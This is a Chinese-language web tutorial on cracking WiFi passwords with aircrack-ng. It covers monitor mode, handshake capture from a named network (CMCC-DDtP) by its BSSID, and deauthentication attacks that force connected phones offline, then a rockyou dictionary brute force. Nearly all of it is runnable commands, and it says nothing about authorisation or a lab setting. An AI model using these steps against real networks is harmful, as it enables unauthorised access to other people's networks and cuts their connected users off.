HOME> 跨服战场> aircrack-ng破解无线网络

aircrack-ng破解无线网络

2025-11-15 14:13:11     跨服战场    

(1)插上无线网卡

点击 虚拟机 -> 可移动设备 -> 选择那个有WLAN的 -> 连接

以下操作不是root用户的,需要加上 sudo,操作命令区分大小写

(2)输入ifconfig查看网卡信息,出现wlan0说明连接成功

(3)输入 airmon-ng start wlan0开启网卡监听模式

(4)输入iwconfig命令查看网卡信息

wlan0mon网卡名加了mon则表示成功

选用:输入sudo airmon-ng check kill杀死所有干扰进程,执行本操作后,需要重新启动wlan0监听。

sudo airmon-ng stop wlan0mon sudo airmon-ng start wlan0

(5)输入airodump-ng wlan0mon

开始扫描WiFi,按ctrl+c结束任务

BSSID:wifi的MAC地址

PWR:信号强弱程度,数值越小信号越强

#DATA:数据量,越大使用的人就越多

CH:信道频率(频道)

ESSID为wifi的名称,中文可能会有乱码

(6)数据抓取

//输入

airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon

//例如:本次抓取的wifi名称:CMCC-DDtP

airodump-ng --bssid 10:58:87:2D:75:09 -c 3 -w /home/wifi2/test2 wlan0mon

注意:在输入 “抓包路径” 时,需要自己自定义创建一个目录

如图所示:

如果抓取不到,需要强制把连接的用户踢下线,只有对方重新连接后,才能抓取成功

=强制把连接的用户踢下线操作步骤=

1.查看客户端的mac地址

aireplay-ng -0 0 -c 连接到WiFi的手机mac地址 -a bssid 网卡名(一般为wlan0mon)

如图所示:

2.把查到的手机或者用户踢下线

aireplay-ng -0 0 -c 连接到WiFi的手机mac地址 -a bssid 网卡名(一般为wlan0mon)

3.例如:

aireplay-ng -0 0 -c B8:27:C5:13:E6:BD -a 10:58:87:2D:75:09 wlan0mon

=恢复用户连接=

当使用 aireplay-ng 断开用户连接时。

需要ctrl+c断开后,用户才能自己连接上,否则用户的连接会被受限制

(7)解压kali自带的字典文件

解压 /usr/share/wordlists/ 下的 rockyou.txt.gz 文件

例如 :gzip -d /usr/share/wordlists/rockyou.txt.gz

(8)进行爆破

键入:aircrack-ng -w 字典路径 握手包路径

例如:aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi2/test2-02.cap